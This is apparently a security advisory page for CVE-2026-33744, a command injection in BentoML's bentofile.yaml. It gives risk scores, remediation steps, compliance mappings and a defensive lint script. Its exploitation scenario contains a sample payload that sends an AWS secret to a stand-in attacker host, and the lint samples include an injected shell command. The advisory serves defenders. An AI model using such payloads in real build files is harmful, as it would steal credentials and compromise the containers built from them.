CVE-2026-33744: BentoML: command injection in bentofile.yaml containerize

GHSA-jfjg-vc52-wqvf | Severity: HIGH | CISA SSVC: Attend
Published March 27, 2026
CISO Take

Any team running `bentoml containerize` on untrusted or externally-sourced bentofile.yaml files is exposed to arbitrary command execution at build time — a classic supply-chain injection point in MLOps pipelines. Patch to BentoML 1.4.37 immediately and treat bentofile.yaml with the same scrutiny as Dockerfile or CI/CD scripts. If you cannot patch, block unreviewed bentofile.yaml ingestion in your build pipelines.

What is the risk?

High risk for organizations with collaborative or automated MLOps pipelines where bentofile.yaml originates from shared repositories, model hubs, or external contributors. Exploitation is trivial — no ML expertise required, just knowledge of shell metacharacters. The local attack vector limits opportunistic internet exposure, but CI/CD systems routinely pull and build from external sources, effectively elevating this to a remote-exploitable scenario in practice. Build-time compromise is particularly dangerous because artifacts (container images) propagate downstream before detection.

What systems are affected?

Package: BentoML
Ecosystem: pip
Vulnerable range: <= 1.4.36
Patched: 1.4.37

How severe is it?

CVSS 3.1 base score: 7.8 / 10
EPSS: 0.3% chance of exploitation in 30 days (higher than 17% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

Attack Vector (AV): Local
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

What should I do?

5 steps
  1. PATCH

    Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents.

  2. AUDIT

    Review all bentofile.yaml files in your repositories for suspicious entries in system_packages — values containing semicolons, ampersands, pipes, backticks, or $() are red flags.

  3. GATE

    Add a pre-build lint step (grep/regex) to reject bentofile.yaml with non-alphanumeric characters in system_packages.

  4. ISOLATE

    Run bentoml containerize in ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts).

  5. DETECT

    Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.

What does CISA's SSVC say?

Decision: Attend
Exploitation: poc
Automatable: No
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
  Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
  A.6.2.6 - Information security measures for AI systems
  A.8.4 - AI system third-party and supply chain
NIST AI RMF
  GOVERN 6.1 - Policies and procedures are in place for AI supply chain risk management
  MANAGE 2.2 - Mechanisms are in place to inventory AI systems and their components
OWASP LLM Top 10
  LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

Is CVE-2026-33744 actively exploited?

No confirmed active exploitation of CVE-2026-33744 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-33744?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps build pipelines, container registries, training pipelines.

What is the CVSS score for CVE-2026-33744?

CVE-2026-33744 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.26%.

What is the AI security impact?

Affected AI Architectures

model serving, MLOps build pipelines, container registries, training pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.004 Container Registry
AML.T0011 User Execution
AML.T0050 Command and Scripting Interpreter
AML.T0079 Stage Capabilities

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.6.2.6, A.8.4
NIST AI RMF: GOVERN 6.1, MANAGE 2.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages` is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue.

Exploitation Scenario

A threat actor targeting an ML engineering team submits a pull request to an open-source BentoML model repository, modifying bentofile.yaml to include a malicious system_packages entry such as `curl http://attacker.com/exfil?k=$(cat /run/secrets/aws_key)`. When a developer or CI/CD pipeline runs `bentoml containerize` to build the model's serving container — a routine step before deployment — the injected command executes during the Docker RUN layer, exfiltrating build secrets or installing a persistent backdoor into the resulting container image. The compromised image is then pushed to the container registry and deployed to production model serving infrastructure.
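A pre-build gate of the kind the AUDIT and GATE steps above call for, written against the mechanism the advisory describes (`system_packages` strings interpolated into a Dockerfile `RUN` line). This is an added example, not BentoML's code or its fix: the function names, the block-style YAML extractor and the Debian-style package-name pattern are assumptions, and the pattern deliberately goes beyond a strict alphanumeric rule because real package names such as `libssl-dev`, `g++` or `python3.11` contain `-`, `+` and `.`.

```python
import re
import shlex

# apt package names: alphanumeric start, then lowercase letters, digits, '+', '-', '.';
# optional "=version" pin (e.g. curl=7.88.1-10). Assumption: Debian-style naming.
PKG_RE = re.compile(r"^[a-z0-9][a-z0-9+.-]+(=[A-Za-z0-9:.+~-]+)?$")
SHELL_META = set(";&|`$()<>{}\\\"'*?\n")  # characters that change RUN parsing


def classify_entry(entry):
    """Return 'ok', or the reason a system_packages entry must be rejected."""
    if not isinstance(entry, str):
        return "not a string"
    bad = sorted({c for c in entry if c in SHELL_META or c.isspace()})
    if bad:
        return "shell metacharacters: " + repr("".join(bad))
    if not PKG_RE.match(entry):
        return "not a valid apt package name"
    return "ok"


def extract_system_packages(text):
    """Collect '- item' lines under 'system_packages:' (block-style list).
    Assumption: a production gate would use a real YAML parser instead."""
    pkgs, in_list, key_indent = [], False, 0
    for line in text.splitlines():
        stripped, indent = line.strip(), len(line) - len(line.lstrip())
        if stripped.startswith("system_packages:"):
            in_list, key_indent = True, indent
        elif in_list and stripped.startswith("- ") and indent >= key_indent:
            pkgs.append(stripped[2:].strip().strip("'\""))
        elif in_list and stripped:  # next mapping key ends the list
            in_list = False
    return pkgs


def lint_bentofile(text):
    """Return findings for a bentofile.yaml text; an empty list means pass."""
    findings = []
    for i, entry in enumerate(extract_system_packages(text)):
        verdict = classify_entry(entry)
        if verdict != "ok":
            findings.append(f"system_packages[{i}] {entry!r}: {verdict}")
    return findings


def render_run_line(pkgs):
    """Defence in depth (illustrative, not BentoML's fix): shell-quote names before
    interpolating them into RUN so an entry that slipped past the lint stays literal."""
    return "RUN apt-get install -y " + " ".join(shlex.quote(p) for p in pkgs)


# Constructed samples (not taken from the advisory): one clean file, one tampered.
CLEAN = "docker:\n  system_packages:\n    - git\n    - libgomp1\n    - curl=7.88.1-10\n"
TAMPERED = "docker:\n  system_packages:\n    - git\n    - 'curl && echo injected > /tmp/m'\n"
```

Wire `lint_bentofile` into CI so a non-empty findings list fails the job before `bentoml containerize` runs.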

Weaknesses (CWE)

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

  • [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
  • [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published: March 27, 2026
Last Modified: March 27, 2026
First Seen: March 27, 2026
